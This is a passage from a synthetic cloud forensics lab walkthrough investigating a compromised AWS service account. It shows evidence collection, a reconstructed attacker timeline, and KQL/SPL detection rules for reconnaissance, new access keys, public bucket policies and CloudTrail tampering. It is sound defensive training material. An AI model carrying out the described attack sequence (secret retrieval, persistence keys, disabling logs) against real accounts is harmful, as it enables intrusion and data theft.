Critical Finding: S3 Bucket Policy Modification
At 2026-03-24T15:02:33Z, the attacker modified the S3 bucket policy on qfs-datalake-prod-123456789012 to allow public read access (Principal: *). This is a data exfiltration preparation technique. Immediate containment action required: revert the bucket policy and block the compromised credentials.
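The pattern behind this finding, an `Allow` statement granting access to an anonymous principal, can be detected mechanically in any `PutBucketPolicy` request parameters. A minimal sketch:

```python
def public_statements(policy_doc):
    """Return Allow statements that grant access to an anonymous
    principal ("*" or {"AWS": "*"}) in an S3 bucket policy document."""
    flagged = []
    for stmt in policy_doc.get("Statement", []):
        principal = stmt.get("Principal")
        is_anonymous = principal == "*" or (
            isinstance(principal, dict) and principal.get("AWS") == "*"
        )
        if stmt.get("Effect") == "Allow" and is_anonymous:
            flagged.append(stmt)
    return flagged
```

For containment, reverting the policy and enabling `aws s3api put-public-access-block` on the bucket, plus deactivating the compromised keys with `aws iam update-access-key --status Inactive`, are the usual first moves; confirm exact flags against your AWS CLI version before acting.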
Step 1.4: IAM Credential Report Analysis¶
# ============================================================
# Step 1.4: Generate and Analyze IAM Credential Report
# Identify all access keys, MFA status, password age
# ============================================================
# Generate IAM credential report
$ aws iam generate-credential-report --profile forensics
{
"State": "STARTED",
"Description": "No report exists. Starting a new report generation."
}
# Wait for report, then download
$ aws iam get-credential-report --profile forensics --output text \
--query 'Content' | base64 -d > ${EVIDENCE_DIR}/iam_credential_report.csv
# Analyze the compromised account's credential status
$ cat ${EVIDENCE_DIR}/iam_credential_report.csv | \
grep "dev-jenkins-ci"
# SYNTHETIC OUTPUT:
# dev-jenkins-ci,arn:aws:iam::123456789012:user/dev-jenkins-ci,2025-06-15T10:22:00+00:00,false,N/A,N/A,N/A,false,true,2025-06-15T10:22:00+00:00,2026-03-24T14:28:11+00:00,us-east-1,true,2026-03-24T14:36:12+00:00,2026-03-24T16:15:00+00:00,us-east-1
# Parse the credential report for key findings
$ python3 << 'PYEOF'
import csv
import io
from datetime import datetime
# SYNTHETIC credential report data
csv_data = """user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date,access_key_1_last_used_region,access_key_2_active,access_key_2_last_rotated,access_key_2_last_used_date,access_key_2_last_used_region
dev-jenkins-ci,arn:aws:iam::123456789012:user/dev-jenkins-ci,2025-06-15T10:22:00+00:00,false,N/A,N/A,N/A,false,true,2025-06-15T10:22:00+00:00,2026-03-24T14:28:11+00:00,us-east-1,true,2026-03-24T14:36:12+00:00,2026-03-24T16:15:00+00:00,us-east-1
admin-forensics,arn:aws:iam::123456789012:user/admin-forensics,2025-01-10T09:00:00+00:00,true,2026-03-24T15:00:00+00:00,2026-02-15T10:00:00+00:00,2026-05-16T10:00:00+00:00,true,true,2026-02-15T10:00:00+00:00,2026-03-24T16:00:00+00:00,us-east-1,false,N/A,N/A,N/A"""
reader = csv.DictReader(io.StringIO(csv_data))
for row in reader:
if row['user'] == 'dev-jenkins-ci':
print("=" * 60)
print(f"COMPROMISED ACCOUNT ANALYSIS: {row['user']}")
print("=" * 60)
print(f" Account Created: {row['user_creation_time']}")
print(f" Password Enabled: {row['password_enabled']}")
print(f" MFA Active: {row['mfa_active']} *** NO MFA ***")
print(f" Access Key 1 Active: {row['access_key_1_active']}")
print(f" Key 1 Last Rotated: {row['access_key_1_last_rotated']}")
print(f" Key 1 Last Used: {row['access_key_1_last_used_date']}")
print(f" Access Key 2 Active: {row['access_key_2_active']}")
print(f" Key 2 Last Rotated: {row['access_key_2_last_rotated']}")
print(f" Key 2 Last Used: {row['access_key_2_last_used_date']}")
print()
print("FINDINGS:")
print(" [!] MFA is NOT enabled on this service account")
print(" [!] Access Key 1 has NOT been rotated in 9+ months")
print(" [!] Access Key 2 was created on 2026-03-24 — ATTACKER CREATED")
print(" [!] Both access keys are currently active")
print()
print("RECOMMENDATIONS:")
print(" [1] Immediately deactivate both access keys")
print(" [2] Enforce MFA on all service accounts")
print(" [3] Implement 90-day key rotation policy")
print(" [4] Investigate Access Key 2 usage")
PYEOF
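The manual "9+ months without rotation" observation above generalizes into an automated staleness check over the whole credential report. A sketch, assuming rows parsed with `csv.DictReader` as in the previous script and a 90-day rotation policy:

```python
from datetime import datetime

def stale_keys(report_rows, now, max_age_days=90):
    """Flag active access keys whose last rotation exceeds the policy
    window. `now` must be a timezone-aware datetime; credential-report
    timestamps like '2025-06-15T10:22:00+00:00' parse with fromisoformat."""
    flagged = []
    for row in report_rows:
        for slot in ("1", "2"):
            if row.get(f"access_key_{slot}_active") != "true":
                continue
            rotated = row.get(f"access_key_{slot}_last_rotated", "N/A")
            if rotated == "N/A":
                continue
            age = (now - datetime.fromisoformat(rotated)).days
            if age > max_age_days:
                flagged.append((row["user"], slot, age))
    return flagged
```

Against the synthetic report, only Access Key 1 is flagged; Access Key 2 is brand new, which is exactly why its creation date (not its age) is the indicator of compromise.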
Step 1.5: CloudWatch Logs Insights Queries¶
# ============================================================
# Step 1.5: CloudWatch Logs Insights — Deep-Dive Analysis
# Query application and system logs for attacker activity
# ============================================================
# Query CloudWatch for API Gateway access from attacker IP
$ aws logs start-query \
--log-group-name "/aws/apigateway/qfs-banking-api" \
--start-time $(date -d "2026-03-22" +%s) \
--end-time $(date -d "2026-03-25" +%s) \
--query-string 'fields @timestamp, @message
| filter sourceIp = "203.0.113.42"
| sort @timestamp asc
| limit 100' \
--profile forensics
# SYNTHETIC query ID returned:
# { "queryId": "a1b2c3d4-5678-90ab-cdef-aaaaaaaaaaaa" }
# Retrieve results (SYNTHETIC)
$ aws logs get-query-results --query-id a1b2c3d4-5678-90ab-cdef-aaaaaaaaaaaa --profile forensics
# SYNTHETIC OUTPUT — API Gateway access from attacker:
{
"results": [
[
{"field": "@timestamp", "value": "2026-03-24 15:10:22.000"},
{"field": "@message", "value": "GET /api/v2/accounts HTTP/1.1 200 sourceIp=203.0.113.42 userAgent=python-requests/2.31.0"}
],
[
{"field": "@timestamp", "value": "2026-03-24 15:11:05.000"},
{"field": "@message", "value": "GET /api/v2/accounts/export?format=csv HTTP/1.1 200 sourceIp=203.0.113.42 userAgent=python-requests/2.31.0"}
],
[
{"field": "@timestamp", "value": "2026-03-24 15:12:33.000"},
{"field": "@message", "value": "GET /api/v2/transactions?startDate=2026-01-01&limit=10000 HTTP/1.1 200 sourceIp=203.0.113.42 userAgent=python-requests/2.31.0"}
]
],
"statistics": {
"recordsMatched": 47.0,
"recordsScanned": 1250000.0,
"bytesScanned": 892000000.0
},
"status": "Complete"
}
# Query for unusual SSM (Systems Manager) activity — potential lateral movement
$ aws logs start-query \
--log-group-name "/aws/ssm/session-manager" \
--start-time $(date -d "2026-03-24" +%s) \
--end-time $(date -d "2026-03-25" +%s) \
--query-string 'fields @timestamp, target, sessionOwner, @message
| filter sessionOwner like /dev-jenkins/
| sort @timestamp asc' \
--profile forensics
# SYNTHETIC OUTPUT:
{
"results": [
[
{"field": "@timestamp", "value": "2026-03-24 15:55:12.000"},
{"field": "target", "value": "i-0a1b2c3d4e5f6789a"},
{"field": "sessionOwner", "value": "arn:aws:iam::123456789012:user/dev-jenkins-ci"},
{"field": "@message", "value": "Session started to instance i-0a1b2c3d4e5f6789a from 203.0.113.42"}
]
],
"statistics": {
"recordsMatched": 1.0,
"recordsScanned": 15000.0,
"bytesScanned": 8500000.0
},
"status": "Complete"
}
# FINDING: Attacker used SSM Session Manager to access the API Gateway
# instance (i-0a1b2c3d4e5f6789a) at 15:55 UTC
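Logs Insights returns each result row as a list of `{"field", "value"}` pairs rather than a flat record, which is awkward for timeline work. A minimal pure-Python sketch (the sample data below is the SYNTHETIC output shown above) flattens each row into a plain dict:

```python
# Flatten CloudWatch Logs Insights results (lists of {"field","value"}
# pairs, as returned by `aws logs get-query-results`) into plain dicts.

def flatten_insights_results(response: dict) -> list[dict]:
    """Convert each result row into a {field: value} dict."""
    return [
        {cell["field"]: cell["value"] for cell in row}
        for row in response.get("results", [])
    ]

# SYNTHETIC sample mirroring the query output above
response = {
    "results": [
        [
            {"field": "@timestamp", "value": "2026-03-24 15:10:22.000"},
            {"field": "@message", "value": "GET /api/v2/accounts HTTP/1.1 200"},
        ]
    ],
    "status": "Complete",
}

rows = flatten_insights_results(response)
print(rows[0]["@timestamp"])  # 2026-03-24 15:10:22.000
```

The flattened dicts can then be merged directly into the timeline script in Step 1.6.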
Step 1.6: Timeline Reconstruction Script¶
#!/usr/bin/env python3
"""
CloudTrail Timeline Reconstruction Script
Case: QFS-IR-2026-0042
All data is 100% SYNTHETIC
"""
import json
from datetime import datetime
from collections import defaultdict
# SYNTHETIC CloudTrail events for the compromised account from 203.0.113.42
attacker_events = [
# Phase 1: Reconnaissance (14:28 - 14:34)
{"time": "2026-03-24T14:28:11Z", "api": "GetCallerIdentity", "service": "sts", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:28:15Z", "api": "ListAttachedUserPolicies", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:28:18Z", "api": "ListGroupsForUser", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:28:22Z", "api": "ListAccessKeys", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:29:01Z", "api": "ListUsers", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:29:35Z", "api": "ListRoles", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:30:12Z", "api": "DescribeInstances", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:30:45Z", "api": "DescribeVpcs", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:30:58Z", "api": "DescribeSubnets", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:31:22Z", "api": "DescribeSecurityGroups", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:31:55Z", "api": "DescribeVolumes", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:32:10Z", "api": "ListBuckets", "service": "s3", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:32:44Z", "api": "GetBucketAcl", "service": "s3", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:33:01Z", "api": "GetBucketPolicy", "service": "s3", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:34:22Z", "api": "ListSecrets", "service": "secretsmanager", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:34:55Z", "api": "GetSecretValue", "service": "secretsmanager", "status": "SUCCESS", "phase": "Credential Access"},
# Phase 2: Persistence & Privilege Escalation (14:36 - 14:42)
{"time": "2026-03-24T14:36:12Z", "api": "CreateAccessKey", "service": "iam", "status": "SUCCESS", "phase": "Persistence"},
{"time": "2026-03-24T14:38:00Z", "api": "AssumeRole", "service": "sts", "status": "AccessDenied", "phase": "PrivEsc Attempt"},
{"time": "2026-03-24T14:38:15Z", "api": "AssumeRole", "service": "sts", "status": "AccessDenied", "phase": "PrivEsc Attempt"},
{"time": "2026-03-24T14:40:22Z", "api": "RunInstances", "service": "ec2", "status": "SUCCESS", "phase": "Resource Hijacking"},
# Phase 3: Data Access & Exfiltration Prep (15:00 - 15:15)
{"time": "2026-03-24T15:02:33Z", "api": "PutBucketPolicy", "service": "s3", "status": "SUCCESS", "phase": "Exfiltration Prep"},
{"time": "2026-03-24T15:05:00Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Access"},
{"time": "2026-03-24T15:05:15Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Access"},
{"time": "2026-03-24T15:05:30Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Access"},
{"time": "2026-03-24T15:10:22Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Access"},
    # Phase 4: Anti-Forensics Attempt (15:47 - 15:48)
    {"time": "2026-03-24T15:47:22Z", "api": "StopLogging", "service": "cloudtrail", "status": "AccessDenied", "phase": "Anti-Forensics"},
    {"time": "2026-03-24T15:48:05Z", "api": "DeleteTrail", "service": "cloudtrail", "status": "AccessDenied", "phase": "Anti-Forensics"},
    # Phase 5: Lateral Movement via SSM (15:55)
    {"time": "2026-03-24T15:55:12Z", "api": "StartSession", "service": "ssm", "status": "SUCCESS", "phase": "Lateral Movement"},
# Phase 6: Continued Data Exfiltration (16:00 - 18:22)
{"time": "2026-03-24T16:00:00Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Exfiltration"},
{"time": "2026-03-24T16:15:00Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Exfiltration"},
{"time": "2026-03-24T17:30:00Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Exfiltration"},
{"time": "2026-03-24T18:22:05Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Exfiltration"},
]
# Build timeline report
print("=" * 80)
print(f"CASE: QFS-IR-2026-0042 — AWS CloudTrail Attacker Timeline")
print(f"Account: dev-jenkins-ci | Source IP: 203.0.113.42 (SYNTHETIC)")
print(f"Period: 2026-03-24T14:28:11Z to 2026-03-24T18:22:05Z")
print("=" * 80)
print()
# Group by phase
phases = defaultdict(list)
for event in sorted(attacker_events, key=lambda x: x["time"]):
phases[event["phase"]].append(event)
for phase, events in phases.items():
print(f"\n--- {phase} ({len(events)} events) ---")
for e in events:
status_icon = "[+]" if e["status"] == "SUCCESS" else "[!]"
print(f" {status_icon} {e['time']} | {e['service']:20s} | {e['api']:35s} | {e['status']}")
# Summary statistics
print("\n" + "=" * 80)
print("SUMMARY")
print("=" * 80)
service_counts = defaultdict(int)
for e in attacker_events:
service_counts[e["service"]] += 1
print(f"\nTotal API calls from attacker IP: {len(attacker_events)}")
print(f"Duration: ~3h 54m")
print(f"\nAPI calls by service:")
for svc, count in sorted(service_counts.items(), key=lambda x: -x[1]):
print(f" {svc:25s}: {count}")
print(f"\nKey Findings:")
print(f" 1. Attacker performed systematic IAM and infrastructure reconnaissance")
print(f" 2. Created a persistence access key (CreateAccessKey at 14:36)")
print(f" 3. Failed privilege escalation via AssumeRole (2 attempts)")
print(f" 4. Modified S3 bucket policy to allow public access (data exfil prep)")
print(f" 5. Accessed Secrets Manager to retrieve stored credentials")
print(f" 6. Used SSM Session Manager for lateral movement to EC2 instance")
print(f" 7. Attempted to disable CloudTrail logging (anti-forensics, denied)")
print(f" 8. Exfiltrated data from S3 data lake over ~2.5 hours")
print(f"\n{'='*80}")
print("ALL DATA IN THIS TIMELINE IS 100% SYNTHETIC")
print(f"{'='*80}")
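The `Duration: ~3h 54m` line in the script above is hardcoded; computing it from the event timestamps (floored to the minute) keeps the report correct if events are added. A small sketch, assuming the same ISO-8601 `Z`-suffixed format used in `attacker_events`:

```python
# Compute attack duration from event timestamps instead of hardcoding it.
from datetime import datetime

def parse_ts(ts: str) -> datetime:
    # datetime.fromisoformat() rejects a trailing "Z" before Python 3.11
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))

def span(events: list[dict]) -> str:
    """Return the first-to-last event span, floored to whole minutes."""
    times = sorted(parse_ts(e["time"]) for e in events)
    hours, rem = divmod(int((times[-1] - times[0]).total_seconds()), 3600)
    return f"~{hours}h {rem // 60}m"

# SYNTHETIC endpoints from the timeline above
events = [
    {"time": "2026-03-24T14:28:11Z"},
    {"time": "2026-03-24T18:22:05Z"},
]
print(span(events))  # ~3h 53m
```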
Step 1.7: Evidence Chain of Custody Documentation¶
# ============================================================
# Step 1.7: Chain of Custody Record for CloudTrail Evidence
# ============================================================
$ cat > ~/cloud-dfir-lab24/chain-of-custody/coc-001-cloudtrail.json << 'COC_EOF'
{
"chain_of_custody_record": {
"record_id": "COC-QFS-2026-0042-001",
"case_id": "QFS-IR-2026-0042",
"evidence_description": "AWS CloudTrail logs from account 123456789012, us-east-1, date range 2026-03-22 to 2026-03-25",
"evidence_type": "Cloud API Audit Logs",
"source_location": "s3://qfs-cloudtrail-123456789012/AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/",
"custody_entries": [
{
"sequence": 1,
"datetime": "2026-03-24T16:00:00Z",
"action": "Acquired",
"handler": "forensic-analyst@quantumfinancial.example.com",
"handler_title": "Senior DFIR Analyst",
"method": "AWS CLI s3 sync with --exact-timestamps",
"destination": "~/cloud-dfir-lab24/evidence/aws/cloudtrail/raw/",
"integrity_hash": "SHA-256 manifest: evidence_hashes_raw.sha256",
"file_count": 4287,
"total_size": "189 MB",
"notes": "CloudTrail log integrity validation passed: 72/72 digests valid, 4287/4287 files valid. Downloaded over encrypted TLS connection."
},
{
"sequence": 2,
"datetime": "2026-03-24T16:15:00Z",
"action": "Processed",
"handler": "forensic-analyst@quantumfinancial.example.com",
"handler_title": "Senior DFIR Analyst",
"method": "Decompressed and merged with jq",
"destination": "~/cloud-dfir-lab24/evidence/aws/cloudtrail/cloudtrail_20260324_merged.json",
"integrity_hash": "SHA-256: a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2",
"notes": "Merged logs for 2026-03-24 for timeline analysis. Original compressed files preserved separately."
},
{
"sequence": 3,
"datetime": "2026-03-24T17:30:00Z",
"action": "Analyzed",
"handler": "forensic-analyst@quantumfinancial.example.com",
"handler_title": "Senior DFIR Analyst",
"method": "Python timeline reconstruction script",
"destination": "~/cloud-dfir-lab24/evidence/aws/cloudtrail/attacker_timeline_aws.json",
"notes": "Extracted 235 attacker API calls from 203.0.113.42. Timeline report generated."
}
],
"storage_location": "Encrypted forensic workstation (LUKS volume, AES-256)",
"access_control": "Restricted to IR team members only",
"retention_period": "7 years per financial regulatory requirement",
"synthetic_notice": "THIS IS A SYNTHETIC TRAINING RECORD — NOT A REAL INVESTIGATION"
}
}
COC_EOF
echo "[+] Chain of custody record COC-001 created"
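Custody records are append-only: every handoff or processing step adds a new entry with the next sequence number and a UTC timestamp. A sketch of that bookkeeping, assuming the JSON layout above (handler names and actions are illustrative):

```python
# Append the next numbered custody entry to a chain-of-custody record.
from datetime import datetime, timezone

def append_custody_entry(record: dict, action: str, handler: str,
                         method: str, notes: str) -> dict:
    entries = record["chain_of_custody_record"]["custody_entries"]
    entries.append({
        "sequence": entries[-1]["sequence"] + 1 if entries else 1,
        "datetime": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "action": action,
        "handler": handler,
        "method": method,
        "notes": notes,
    })
    return record

# SYNTHETIC demo record with one existing entry
record = {"chain_of_custody_record": {"custody_entries": [
    {"sequence": 1, "action": "Acquired"},
]}}
append_custody_entry(record, "Transferred",
                     "ir-lead@quantumfinancial.example.com",
                     "Encrypted drive handoff", "SYNTHETIC training entry")
print(record["chain_of_custody_record"]["custody_entries"][-1]["sequence"])  # 2
```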
Exercise 1 Detection Queries¶
// -----------------------------------------------------------------
// Detection (Microsoft Sentinel KQL): Suspicious CloudTrail API
// Reconnaissance Pattern
// Case: QFS-IR-2026-0042 | MITRE: T1087.004, T1580
// -----------------------------------------------------------------
let ReconAPIs = dynamic([
"GetCallerIdentity", "ListUsers", "ListRoles",
"ListAttachedUserPolicies", "ListGroupsForUser",
"DescribeInstances", "DescribeVpcs", "DescribeSubnets",
"DescribeSecurityGroups", "ListBuckets"
]);
AWSCloudTrail
| where TimeGenerated > ago(24h)
| where EventName in (ReconAPIs)
| summarize
ReconAPICount = dcount(EventName),
APIList = make_set(EventName),
TotalCalls = count(),
FirstCall = min(TimeGenerated),
LastCall = max(TimeGenerated),
SourceIPs = make_set(SourceIpAddress)
by UserIdentityArn, UserIdentityUserName
| where ReconAPICount >= 6
| extend DurationMinutes = datetime_diff('minute', LastCall, FirstCall)
| where DurationMinutes <= 30
| project
UserIdentityUserName,
UserIdentityArn,
ReconAPICount,
TotalCalls,
DurationMinutes,
FirstCall,
LastCall,
SourceIPs,
APIList
// -----------------------------------------------------------------
// Detection: CloudTrail Tampering Attempt (Anti-Forensics)
// MITRE: T1562.008 — Disable or Modify Cloud Logs
// -----------------------------------------------------------------
AWSCloudTrail
| where TimeGenerated > ago(7d)
| where EventName in (
"StopLogging", "DeleteTrail", "UpdateTrail",
"PutEventSelectors", "DeleteEventDataStore",
"StopEventDataStoreIngestion"
)
| project
TimeGenerated,
EventName,
UserIdentityUserName,
UserIdentityArn,
SourceIpAddress,
ErrorCode,
ErrorMessage,
RequestParameters
| order by TimeGenerated asc
// -----------------------------------------------------------------
// Detection: New IAM Access Key Creation (Persistence)
// MITRE: T1098.001 — Account Manipulation: Additional Cloud Credentials
// -----------------------------------------------------------------
AWSCloudTrail
| where TimeGenerated > ago(24h)
| where EventName == "CreateAccessKey"
| where isempty(ErrorCode)
| project
TimeGenerated,
UserIdentityUserName,
SourceIpAddress,
UserAgent,
TargetUser = tostring(parse_json(RequestParameters).userName),
ResponseAccessKeyId = tostring(parse_json(ResponseElements).accessKey.accessKeyId)
| join kind=leftanti (
// Exclude known automation
datatable(SourceIpAddress: string) [
"10.100.2.50", // Jenkins server (SYNTHETIC)
"10.50.1.10" // Bastion host (SYNTHETIC)
]
) on SourceIpAddress
// -----------------------------------------------------------------
// Detection: S3 Bucket Policy Made Public (Data Exfiltration Prep)
// MITRE: T1530 — Data from Cloud Storage
// -----------------------------------------------------------------
AWSCloudTrail
| where TimeGenerated > ago(7d)
// Note: PutPublicAccessBlock events carry no policy body; the event that
// removes public-access protection is DeletePublicAccessBlock
| where EventName in ("PutBucketPolicy", "PutBucketAcl", "DeletePublicAccessBlock")
| extend PolicyText = tostring(parse_json(RequestParameters).policy)
| where EventName == "DeletePublicAccessBlock" or
        PolicyText contains "\"Principal\":\"*\"" or
        PolicyText contains "\"Principal\":{\"AWS\":\"*\"}"
| project
TimeGenerated,
EventName,
UserIdentityUserName,
SourceIpAddress,
BucketName = tostring(parse_json(RequestParameters).bucketName),
PolicyText,
UserAgent
// -----------------------------------------------------------------
// Detection (Splunk SPL): Suspicious CloudTrail API Reconnaissance
// Pattern — SPL equivalents of the Sentinel queries above
// Case: QFS-IR-2026-0042 | MITRE: T1087.004, T1580
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
(eventName="GetCallerIdentity" OR eventName="ListUsers" OR
eventName="ListRoles" OR eventName="ListAttachedUserPolicies" OR
eventName="ListGroupsForUser" OR eventName="DescribeInstances" OR
eventName="DescribeVpcs" OR eventName="DescribeSubnets" OR
eventName="DescribeSecurityGroups" OR eventName="ListBuckets")
earliest=-24h
| stats
dc(eventName) as ReconAPICount,
values(eventName) as APIList,
count as TotalCalls,
min(_time) as FirstCall,
max(_time) as LastCall,
values(sourceIPAddress) as SourceIPs
by userIdentity.arn, userIdentity.userName
| where ReconAPICount >= 6
| eval DurationMinutes = round((LastCall - FirstCall) / 60, 1)
| where DurationMinutes <= 30
| convert ctime(FirstCall) ctime(LastCall)
| table userIdentity.userName, userIdentity.arn, ReconAPICount,
TotalCalls, DurationMinutes, FirstCall, LastCall, SourceIPs, APIList
// -----------------------------------------------------------------
// Detection: CloudTrail Tampering Attempt (Anti-Forensics)
// MITRE: T1562.008 — Disable or Modify Cloud Logs
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
(eventName="StopLogging" OR eventName="DeleteTrail" OR
eventName="UpdateTrail" OR eventName="PutEventSelectors" OR
eventName="DeleteEventDataStore" OR
eventName="StopEventDataStoreIngestion")
earliest=-7d
| table _time, eventName, userIdentity.userName, userIdentity.arn,
sourceIPAddress, errorCode, errorMessage, requestParameters
// -----------------------------------------------------------------
// Detection: New IAM Access Key Creation (Persistence)
// MITRE: T1098.001 — Account Manipulation: Additional Cloud Credentials
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail" eventName="CreateAccessKey"
NOT errorCode=*
earliest=-24h
| eval TargetUser=spath(requestParameters, "userName")
| eval NewKeyId=spath(responseElements, "accessKey.accessKeyId")
| search NOT sourceIPAddress IN ("10.100.2.50", "10.50.1.10")
| table _time, userIdentity.userName, sourceIPAddress, userAgent,
TargetUser, NewKeyId
// -----------------------------------------------------------------
// Detection: S3 Bucket Policy Made Public (Data Exfiltration Prep)
// MITRE: T1530 — Data from Cloud Storage
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
    (eventName="PutBucketPolicy" OR eventName="PutBucketAcl" OR
     eventName="DeletePublicAccessBlock")
    earliest=-7d
| eval PolicyText=spath(requestParameters, "policy")
| eval BucketName=spath(requestParameters, "bucketName")
| where eventName="DeletePublicAccessBlock" OR
        like(PolicyText, "%\"Principal\":\"*\"%") OR
        like(PolicyText, "%\"Principal\":{\"AWS\":\"*\"}%")
| table _time, eventName, userIdentity.userName, sourceIPAddress,
BucketName, PolicyText, userAgent
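The KQL and SPL recon detections above share one heuristic: flag an identity that calls at least 6 distinct reconnaissance APIs within a 30-minute window. A pure-Python restatement of that logic (event tuples are illustrative; thresholds match the queries) is useful for unit-testing the detection before deploying it:

```python
# Same heuristic as the Sentinel/Splunk recon detections above:
# >= 6 distinct recon APIs by one identity within a 30-minute span.
from collections import defaultdict
from datetime import datetime

RECON_APIS = {
    "GetCallerIdentity", "ListUsers", "ListRoles",
    "ListAttachedUserPolicies", "ListGroupsForUser",
    "DescribeInstances", "DescribeVpcs", "DescribeSubnets",
    "DescribeSecurityGroups", "ListBuckets",
}

def flag_recon(events, min_apis=6, max_minutes=30):
    """events: iterable of (user, api, iso_timestamp). Returns flagged users."""
    by_user = defaultdict(list)
    for user, api, ts in events:
        if api in RECON_APIS:
            by_user[user].append((api, datetime.fromisoformat(ts)))
    flagged = []
    for user, calls in by_user.items():
        times = [t for _, t in calls]
        window = (max(times) - min(times)).total_seconds() / 60
        if len({a for a, _ in calls}) >= min_apis and window <= max_minutes:
            flagged.append(user)
    return flagged

# SYNTHETIC events: six distinct recon APIs over five minutes
events = [
    ("dev-jenkins-ci", api, f"2026-03-24T14:{28 + i}:00")
    for i, api in enumerate(["GetCallerIdentity", "ListUsers", "ListRoles",
                             "DescribeInstances", "DescribeVpcs", "ListBuckets"])
]
print(flag_recon(events))  # ['dev-jenkins-ci']
```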
Exercise 2: AWS EC2 Instance Forensic Acquisition¶
Exercise Objective
Perform forensic acquisition of the compromised AWS EC2 instance (API Gateway server). Create EBS snapshots for disk evidence preservation, acquire volatile memory using SSM Run Command, mount disk images read-only for analysis, and examine VPC Flow Logs and S3 access logs to identify data exfiltration patterns.
MITRE ATT&CK Techniques:
- T1059.004 -- Command and Scripting Interpreter: Unix Shell
- T1005 -- Data from Local System
- T1048 -- Exfiltration Over Alternative Protocol
- T1071.001 -- Application Layer Protocol: Web Protocols
- T1570 -- Lateral Tool Transfer
Step 2.1: EBS Snapshot Creation for Evidence Preservation¶
# ============================================================
# Step 2.1: Create EBS Snapshots of Compromised Instance
# Preserves disk state for forensic analysis
# ============================================================
# Identify volumes attached to the compromised instance
$ aws ec2 describe-instances \
--instance-ids i-0a1b2c3d4e5f6789a \
--profile forensics \
--region us-east-1 \
--query 'Reservations[].Instances[].{
InstanceId: InstanceId,
State: State.Name,
LaunchTime: LaunchTime,
PrivateIp: PrivateIpAddress,
SubnetId: SubnetId,
SecurityGroups: SecurityGroups[].GroupId,
Volumes: BlockDeviceMappings[].{
DeviceName: DeviceName,
VolumeId: Ebs.VolumeId,
AttachTime: Ebs.AttachTime,
Status: Ebs.Status
}
}'
# SYNTHETIC OUTPUT:
[
{
"InstanceId": "i-0a1b2c3d4e5f6789a",
"State": "running",
"LaunchTime": "2025-08-15T12:00:00+00:00",
"PrivateIp": "10.100.1.15",
"SubnetId": "subnet-prod-web",
"SecurityGroups": ["sg-0a1b2c3d4e5f0001"],
"Volumes": [
{
"DeviceName": "/dev/xvda",
"VolumeId": "vol-0a1b2c3d4e5f0001",
"AttachTime": "2025-08-15T12:00:30+00:00",
"Status": "attached"
},
{
"DeviceName": "/dev/xvdf",
"VolumeId": "vol-0a1b2c3d4e5f0002",
"AttachTime": "2025-08-20T09:00:00+00:00",
"Status": "attached"
}
]
}
]
# Create forensic snapshots of both volumes with case tagging
$ aws ec2 create-snapshot \
--volume-id vol-0a1b2c3d4e5f0001 \
--description "FORENSIC: Case QFS-IR-2026-0042 | Root volume of i-0a1b2c3d4e5f6789a | Acquired 2026-03-24T16:30Z" \
--tag-specifications 'ResourceType=snapshot,Tags=[
{Key=CaseId,Value=QFS-IR-2026-0042},
{Key=EvidenceType,Value=disk-image},
{Key=SourceInstance,Value=i-0a1b2c3d4e5f6789a},
{Key=SourceVolume,Value=vol-0a1b2c3d4e5f0001},
{Key=AcquiredBy,Value=forensic-analyst},
{Key=Classification,Value=CONFIDENTIAL},
{Key=DoNotDelete,Value=true}
]' \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"SnapshotId": "snap-0a1b2c3d4e5f0001",
"VolumeId": "vol-0a1b2c3d4e5f0001",
"State": "pending",
"VolumeSize": 50,
"StartTime": "2026-03-24T16:30:22.000Z",
"Description": "FORENSIC: Case QFS-IR-2026-0042 | Root volume of i-0a1b2c3d4e5f6789a | Acquired 2026-03-24T16:30Z",
"Encrypted": true
}
# Create snapshot of the data volume
$ aws ec2 create-snapshot \
--volume-id vol-0a1b2c3d4e5f0002 \
--description "FORENSIC: Case QFS-IR-2026-0042 | Data volume of i-0a1b2c3d4e5f6789a | Acquired 2026-03-24T16:31Z" \
--tag-specifications 'ResourceType=snapshot,Tags=[
{Key=CaseId,Value=QFS-IR-2026-0042},
